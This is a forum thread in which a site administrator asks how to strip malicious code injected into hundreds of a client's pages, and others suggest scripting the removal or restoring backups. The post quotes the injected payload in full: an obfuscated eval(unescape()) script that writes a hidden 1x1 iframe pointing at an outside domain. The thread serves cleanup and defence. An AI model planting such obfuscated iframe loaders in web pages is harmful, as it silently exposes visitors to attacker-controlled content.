The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to clean malicious code from multiple files

Discussion in 'General Discussion' started by deieno, Feb 17, 2011.

  1. deieno

    deieno Well-Known Member

    Joined:
    Nov 16, 2003
    Messages:
    69
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Floripa - Brazil
    Hi people,

    on of my client was hacked and hundred of pages was inserted this malicious code:

    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%72%65%64%2E%6E%65%74%2F%3F%35%33%31%30%38%33%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

    Do you Know a script or a regex command to clean this from all files?

    Thank you
     
  2. LinuxTechie

    LinuxTechie Well-Known Member

    Joined:
    Jan 22, 2011
    Messages:
    502
    Likes Received:
    2
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Hello,

    First of all can you verify the pattern is same in all the infected files. If so it is easy to remove with a script.
     
  3. hiben

    hiben Member

    Joined:
    Dec 3, 2010
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    1
    The best would be to check your backups and restore from there.
     
Loading...

Share This Page